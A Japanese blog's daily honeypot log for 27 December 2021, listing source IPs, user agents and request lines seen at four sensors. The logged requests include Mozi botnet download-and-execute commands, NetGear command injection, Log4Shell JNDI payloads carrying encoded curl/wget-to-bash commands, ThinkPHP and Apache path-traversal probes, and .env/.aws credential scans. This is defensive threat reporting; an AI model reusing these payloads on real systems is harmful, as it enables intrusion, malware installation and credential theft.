コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2021/12/27 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2021/12/27分です。

特徴
共通

GPONルータの脆弱性を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
gbrmss/によるスキャン行為
/.envへのスキャン行為

Location:JP

NetGear製品の脆弱性を狙うアクセス
zgrabによるスキャン行為
/.awsへのスキャン行為
/.gitへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http://192.168.1.1:8088/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
Location:US

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為

を確認しました。

Location:UK

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為

を確認しました。

Location:SG

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Laravelへのスキャン行為
112.124.42.80に関する不正通信
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http://192.168.1.1:8088/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
アクセス数推移

JP:総アクセス数:104 (前日比:-12)
US:総アクセス数:64 (前日比:-6)
UK:総アクセス数:30 (前日比:-26)
SG:総アクセス数:99 (前日比:-73)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
9 2.56.59.172 Netherlands
1 2.57.121.38 Romania
2 20.191.87.81 United States
1 23.95.122.10 United States
1 27.47.40.38 China
33 40.65.99.132 United States
1 45.85.90.223 Netherlands
1 45.229.54.92 Brazil
1 61.219.11.151 Taiwan
1 66.240.192.82 United States
2 100.26.250.76 United States
1 104.40.38.7 United States
12 135.125.217.54 France
2 143.244.189.0 United States
1 147.182.232.128 United States
2 157.245.70.127 United States
1 159.223.169.3 United States
1 161.35.184.9 United States
1 165.227.131.62 United States
1 165.232.137.148 United States
1 165.232.142.210 United States
1 167.71.218.46 United States
1 167.99.240.16 United States
1 175.107.5.26 Pakistan
1 178.79.188.49 United States
1 181.214.206.161 United States
4 185.53.90.24 Belize
2 185.254.196.217 Ukraine
6 185.254.196.218 Ukraine
2 192.35.222.102 United States
2 192.95.36.134 Canada
1 192.241.208.213 United States
2 205.185.124.100 United States
1 209.17.96.226 United States
3 222.186.19.235 China

UserAgent一覧

件数 UserAgent
11 -
4 Go-http-client/1.1
1 Hello, world
2 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
33 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
1 Mozilla/5.0 (Windows; U; Windows NT 6.1; it-IT) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.25 Safari/532.5
32 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.551.0 Safari/534.10
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
2 Mozilla/5.0 zgrab/0.x - To opt-out of scans, visit: https[:]//seclab[.]cs[.]ucsb[.]edu/abuse/
1 Mozilla/5.0 zgrab/0.x
9 Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
1 gbrmss/7.29.0

リクエスト内容一覧

件数 Method Request Protocol
1 -
2 \x16\x03\x01\x01\xfa\x01
3 \x16\x03\x01
1 GET /.aws/credentials HTTP/1.1
1 GET /.env.bak HTTP/1.1
36 GET /.env HTTP/1.1
1 GET /.git/HEAD HTTP/1.1
1 GET /_profiler/phpinfo HTTP/1.1
1 GET /ab2g HTTP/1.1
1 GET /ab2h HTTP/1.1
1 GET /admin/.env HTTP/1.1
1 GET /admin/config.php HTTP/1.1
1 GET /api/.env HTTP/1.1
1 GET /api/v1/dags HTTP/1.1
1 GET /app/.env HTTP/1.1
1 GET /app/config/.env HTTP/1.1
1 GET /apps/.env HTTP/1.1
1 GET /audio/.env HTTP/1.1
1 GET /aws.yml HTTP/1.1
1 GET /backend/.env HTTP/1.1
1 GET /base/.env HTTP/1.1
1 GET /blog/.env HTTP/1.1
1 GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0
1 GET /cgi-bin/.env HTTP/1.1
1 GET /conf/.env HTTP/1.1
1 GET /config.js HTTP/1.1
1 GET /config/aws.yml HTTP/1.1
1 GET /config/getuser?index=0 HTTP/1.1
1 GET /core/.env HTTP/1.1
1 GET /crm/.env HTTP/1.1
1 GET /database/.env HTTP/1.1
1 GET /ec2-18-179-20-5.ap-northeast-1.compute.amazonaws.com/.env HTTP/1.1
1 GET /home HTTP/1.1
1 GET /info.php HTTP/1.1
1 GET /laravel/.env HTTP/1.1
1 GET /library/.env HTTP/1.1
1 GET /local/.env HTTP/1.1
1 GET /new/.env HTTP/1.1
1 GET /newsite/.env HTTP/1.1
1 GET /old/.env HTTP/1.1
1 GET /phpinfo.php HTTP/1.1
1 GET /phpinfo HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /protected/.env HTTP/1.1
1 GET /public/.env HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//45[.]229[.]54[.]92:47052/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /sites/all/libraries/mailchimp/.env HTTP/1.1
1 GET /src/.env HTTP/1.1
1 GET /storage/.env HTTP/1.1
1 GET /vendor/.env HTTP/1.1
1 GET /vendor/laravel/.env HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-admin/.env HTTP/1.1
1 GET /wp-content/.env HTTP/1.1
1 GET /www/.env HTTP/1.1
4 GET http[:]//azenv[.]net/ HTTP/1.1
2 GET http[:]//fuwu[.]sogou[.]com/404/index.html HTTP/1.1
1 HEAD / HTTP/1.1
1 OPTIONS / HTTP/1.1
2 POST /boaform/admin/formLogin HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
1 2.57.121.38 Romania
1 5.157.38.50 United States
1 20.122.29.145 United States
2 51.13.93.191 United Kingdom
7 51.79.29.48 Canada
1 61.219.11.151 Taiwan
1 87.251.64.141 Russia
2 94.232.43.63 Russia
1 115.54.93.27 China
8 137.184.221.114 United States
1 143.244.189.0 United States
1 147.182.163.107 United States
2 147.182.232.128 United States
2 157.245.70.127 United States
1 159.223.152.187 United States
1 159.223.161.250 United States
1 159.223.161.251 United States
1 165.232.142.210 United States
2 172.245.21.135 United States
1 178.79.188.49 United States
5 185.53.90.24 Belize
1 185.136.167.59 Germany
2 192.35.222.102 United States
1 192.241.201.118 United States
1 192.241.212.171 United States
1 192.241.213.86 United States
8 195.54.160.149 Russia
1 198.98.49.124 United States
2 205.185.124.100 United States
1 209.17.96.210 United States
3 222.186.19.235 China

UserAgent一覧

件数 UserAgent
1 ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195[.]54[.]160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8zNC42OC4xMTguODM6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMzQuNjguMTE4LjgzOjgwKXxiYXNo}
10 -
5 Go-http-client/1.1
2 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1 Mozilla/5.0 (Macintosh; U; Mac OS X 10_6_1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/ Safari/530.5
7 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.53 Safari/525.19
27 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox
2 Mozilla/5.0 zgrab/0.x - To opt-out of scans, visit: https[:]//seclab[.]cs[.]ucsb[.]edu/abuse/
3 Mozilla/5.0 zgrab/0.x
1 gbrmss/7.29.0

リクエスト内容一覧

件数 Method Request Protocol
1 -
3 \x03
2 \x16\x03\x01
1 GET /${jndi:ldap://121[.]140[.]99[.]236:1389/Exploit} HTTP/1.1
28 GET /.env HTTP/1.1
1 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
1 GET /?x=${jndi:ldap://195[.]54[.]160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8zNC42OC4xMTguODM6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMzQuNjguMTE4LjgzOjgwKXxiYXNo} HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /ab2g HTTP/1.1
1 GET /ab2h HTTP/1.1
1 GET /admin/config.php HTTP/1.1
1 GET /api/v1/dags HTTP/1.1
1 GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0
1 GET /config/getuser?index=0 HTTP/1.1
1 GET /home HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /manager/text/list HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
5 GET http[:]//azenv[.]net/ HTTP/1.1
2 GET http[:]//fuwu[.]sogou[.]com/404/index.html HTTP/1.1
1 HEAD / HTTP/1.1
1 HEAD /robots.txt HTTP/1.0
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
2 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
1 2.57.121.38 Romania
1 20.127.19.25 United States
1 39.86.25.160 China
1 76.98.82.31 United States
2 94.232.43.63 Russia
1 181.214.206.161 United States
3 185.53.90.24 Belize
1 188.166.40.32 United States
1 192.241.215.35 United States
11 195.54.160.149 Russia
1 198.98.49.124 United States
2 205.185.124.100 United States
1 209.17.96.50 United States
3 222.186.19.235 China

UserAgent一覧

件数 UserAgent
5 -
3 Go-http-client/1.1
1 Mozila/5.0
1 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; fr-FR) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.126 Safari/533.4
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
2 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.197.0 Safari/532.0
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.0 zgrab/0.x
1 gbrmss/7.29.0

リクエスト内容一覧

件数 Method Request Protocol
2 \x03
2 \x16\x03\x01
2 GET /.env HTTP/1.1
1 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
1 GET /admin/config.php HTTP/1.1
1 GET /config/getuser?index=0 HTTP/1.1
2 GET /console/ HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//39[.]86[.]25[.]160:37778/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /solr/admin/info/system?wt=json HTTP/1.1
3 GET http[:]//azenv[.]net/ HTTP/1.1
2 GET http[:]//fuwu[.]sogou[.]com/404/index.html HTTP/1.1
1 OPTIONS / HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /HNAP1/ HTTP/1.1
2 POST /boaform/admin/formLogin HTTP/1.1
2 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
1 2.57.121.38 Romania
1 20.92.105.90 United States
1 27.47.42.161 China
33 40.65.99.132 United States
1 45.85.90.223 Netherlands
1 45.89.173.198 Romania
6 51.79.29.48 Canada
1 60.191.125.35 China
1 61.219.11.151 Taiwan
2 94.232.43.63 Russia
1 96.19.238.67 United States
1 103.243.212.184 Malaysia
1 120.86.255.22 China
2 135.148.214.8 United States
2 144.126.209.23 United States
1 147.182.163.107 United States
2 147.182.232.128 United States
2 157.230.216.203 United States
3 163.172.159.134 United Kingdom
4 164.52.24.179 China
1 172.105.53.159 United States
1 178.159.123.117 Ukraine
3 185.53.90.24 Belize
9 185.254.196.223 Ukraine
13 195.54.160.149 Russia
1 198.98.49.124 United States
1 205.185.124.100 United States
1 209.17.96.226 United States
2 222.186.19.235 China

UserAgent一覧

件数 UserAgent
1 ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195[.]54[.]160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMy42Ny40NC4yMzQ6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTMuNjcuNDQuMjM0OjgwKXxiYXNo}
11 -
3 Go-http-client/1.1
2 Hello, world
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
1 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.363.0 Safari/533.3
12 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.6.0) Gecko/20100101 Firefox/52.6.0
1 Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.8 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.8
33 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
26 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 gbrmss/7.29.0

リクエスト内容一覧

件数 Method Request Protocol
1 -
2 \x03
1 \x16\x03\x01\x01 \x01
4 \x16\x03\x01
1 CONNECT www[.]bing[.]com:443 HTTP/1.1
27 GET /.env HTTP/1.1
1 GET /13.67.44.234/.env HTTP/1.1
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
1 GET /?x=${jndi:ldap://195[.]54[.]160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMy42Ny40NC4yMzQ6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTMuNjcuNDQuMjM0OjgwKXxiYXNo} HTTP/1.1
1 GET /HNAP1/ HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /_profiler/phpinfo HTTP/1.1
1 GET /ab2g HTTP/1.1
1 GET /ab2h HTTP/1.1
1 GET /admin/.env HTTP/1.1
1 GET /admin/config.php HTTP/1.1
1 GET /api/.env HTTP/1.1
1 GET /app/.env HTTP/1.1
1 GET /app/config/.env HTTP/1.1
1 GET /apps/.env HTTP/1.1
1 GET /audio/.env HTTP/1.1
1 GET /backend/.env HTTP/1.1
1 GET /base/.env HTTP/1.1
1 GET /blog/.env HTTP/1.1
1 GET /cgi-bin/.env HTTP/1.1
1 GET /conf/.env HTTP/1.1
2 GET /config/getuser?index=0 HTTP/1.1
2 GET /console/ HTTP/1.1
1 GET /core/.env HTTP/1.1
1 GET /crm/.env HTTP/1.1
1 GET /database/.env HTTP/1.1
1 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /laravel/.env HTTP/1.1
1 GET /library/.env HTTP/1.1
1 GET /local/.env HTTP/1.1
1 GET /new/.env HTTP/1.1
1 GET /newsite/.env HTTP/1.1
1 GET /old/.env HTTP/1.1
1 GET /protected/.env HTTP/1.1
1 GET /public/.env HTTP/1.1
2 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /sites/all/libraries/mailchimp/.env HTTP/1.1
1 GET /src/.env HTTP/1.1
1 GET /storage/.env HTTP/1.1
1 GET /vendor/.env HTTP/1.1
1 GET /vendor/laravel/.env HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-admin/.env HTTP/1.1
1 GET /wp-content/.env HTTP/1.1
1 GET /www/.env HTTP/1.1
3 GET http[:]//azenv[.]net/ HTTP/1.1
2 GET http[:]//fuwu[.]sogou[.]com/404/index.html HTTP/1.1
1 GET http[:]//www[.]bing[.]com/ HTTP/1.1
1 HEAD http[:]//112[.]124[.]42[.]80:63435/ HTTP/1.1
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
1 POST http[:]//juliaoglesbee[.]site/ec7fd807cb6125eb18b0fe4ba059d1a5c2817335414af66200b66d6f1ee7a54f58c91d3466f93a071b51f1f1156fd8d34ff02a9f8b9a485173963cf9029e1889b803dab33e79921be0e7a79373119e55df3c66818231f117d35fb3a45089312e HTTP/1.1